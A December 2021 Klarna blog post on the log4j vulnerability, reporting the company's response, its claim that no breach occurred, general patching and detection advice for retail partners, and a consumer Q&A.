Dec 16, 20216 min lästid

Security update – The log4j vulnerability

av Mark Strande

During the last few days, media and businesses globally have reported the identification of a critical vulnerability in a widely used software component called log4j. This vulnerability has affected a very significant number of software programs impacting companies and services globally, including Klarna. We were well prepared to manage this new vulnerability as well as the resulting malware and attacks exploiting this vulnerability, and took swift action. Our automated processes and proactive approach ensured we have closed any exposure in services known to make use of log4j. We continually monitor all new vulnerabilities in log4j and any other software we have, and are applying security updates accordingly.

At Klarna, security and privacy are a top priority, and we would like to reassure both our consumers and retail partners that our Security Operations Center, managing our security monitoring capabilities, has not detected any breach of our systems or products during this period. Our systems and products are fully operational and transacting at full capacity as normal. Additionally, there has been no reported consumer data impact from our security monitoring systems.

Klarna is committed to being transparent with our retail partners and consumers. Here we want to share a short summary of the actions Klarna has taken to mitigate this vulnerability and answer some of the most frequently asked questions below. Additionally, and based on our experiences, we would like to provide advice and support to our retail partners and other stakeholders on actions to take to mitigate this new vulnerability. We believe security and protection is in everyone’s interest to ensure a safe internet environment.

Overview of what happened

Klarna’s network and internal systems are monitored 24/7 through our Security Operations Center ensuring smooth operations including the identification of possible threats. We became aware of the vulnerability at CET 05:17am on Friday Dec 10, and immediately gathered key engineering teams who started to work on this with priority.

The impact on Klarna was limited. Within the first few hours, the majority of our services were fully secured against any potential vulnerabilities. Work continued throughout Friday and over the weekend to monitor for any additional issues. We are continuing to validate that no further exposure exists through additional scans and are actively following up with third-party vendors.

We have also updated our detective and protective measures to manage the new threats. Additionally, we are continually monitoring new developments in attacks against these vulnerabilities, and continue to review our systems and infrastructure for signs of attempted attacks.

Recommendations to retail partners and other stakeholders

We would like to offer some advice to our retail partners and anyone who has services on the internet on how to protect yourself against this vulnerability and what steps can be taken to try to ensure that everyone’s information and systems are safe. This is not a comprehensive list of actions, but what we believe can provide you with some guidance based on insights from Klarna’s Security Operations Center:

  • Make sure to apply security patches and updates to any software that uses log4j and study advisories from your software vendors. Here and here are two lists of well-known software and their statuses. It does not matter what programming languages you are using, some platforms may still be based on Java and use log4j as a component.
  • The use of log4j is prevalent and it may show up in unexpected places – just searching for log4j across file systems can be useful but remember to search software package files and compressed files too, like .jar and .war for example.
  • There are other ways of remediating than patching, see some suggestions here.
  • Update any threat detection systems – many have added signatures to detect exploitation attempts. You can find some advice how to set up patterns for detection of exploitation here
  • The same applies to systems attempting to block threats, like web application firewalls.
  • Consider looking for signatures of exploitation attempts in log files. Note that various obfuscation methods exist, however, tools are being developed to counter this.
  • Contact your service providers and vendors to see if and how they have managed the threat.
  • Consult Cyber Security organizations for advice on how to address these threats. There is good advice available publicly for example from cisa.gov.

Q&A

What is Log4j and this vulnerability?

Log4j is a software component widely used by companies and services globally. The component is used for logging in Java but is also used frequently in other software packages. A few days ago a vulnerability was publicly disclosed in Log4j and fairly shortly after attacks against this vulnerability were observed where hackers attempted to gain control over systems across the internet. Read more here from Apache.org.

As a consumer, is there anything that I need to do?

No, as a Klarna user, there is nothing that you need to do at this time. We have done everything possible to secure our systems and your data. We always recommend you to keep your devices and computers up to date with the latest security updates.

I’m a retail partner, is there anything that I should be doing?

From a Klarna integration perspective, there is nothing that you need to do regarding Klarna products and services but you should ensure your own systems are safe against this threat. Please read the advice above and take necessary actions as soon as possible.

Has this resulted in a security breach or attack at Klarna?

Our security monitoring capabilities have not detected any breach of our systems or products for consumers or retail partners at any time.

Has any personal data been exposed?

There has been no reported consumer data impact.